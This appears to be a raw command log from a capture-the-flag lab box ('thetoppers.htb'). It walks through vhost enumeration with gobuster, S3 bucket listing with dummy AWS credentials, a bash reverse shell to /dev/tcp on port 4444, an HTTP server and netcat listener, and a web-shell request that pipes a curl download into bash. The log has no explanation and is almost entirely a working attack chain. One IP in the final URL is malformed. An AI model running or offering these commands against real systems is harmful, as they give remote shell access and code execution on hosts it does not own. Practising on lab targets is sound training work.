sudo sh -c "echo “10.129.227.248 thetoppers.htb” >> /etc/hosts"
cat /etc/hosts

gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

sudo sh -c "echo “10.129.227.248 s3.thetoppers.htb” >> /etc/hosts"
cat /etc/hosts

aws configure
AWS Access Key ID [None]: temp
AWS Secret Access Key [None]: temp 
Default region name [None]: temp
Default output format [None]: temp

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.14.128/4444 0>&1' > shell.sh

python3 -m http.server 8000

nc -nvlp 4444

http://thetoppers.htb/shell.php?cmd=curl%2010.10.10.14.128/shell.sh|bash
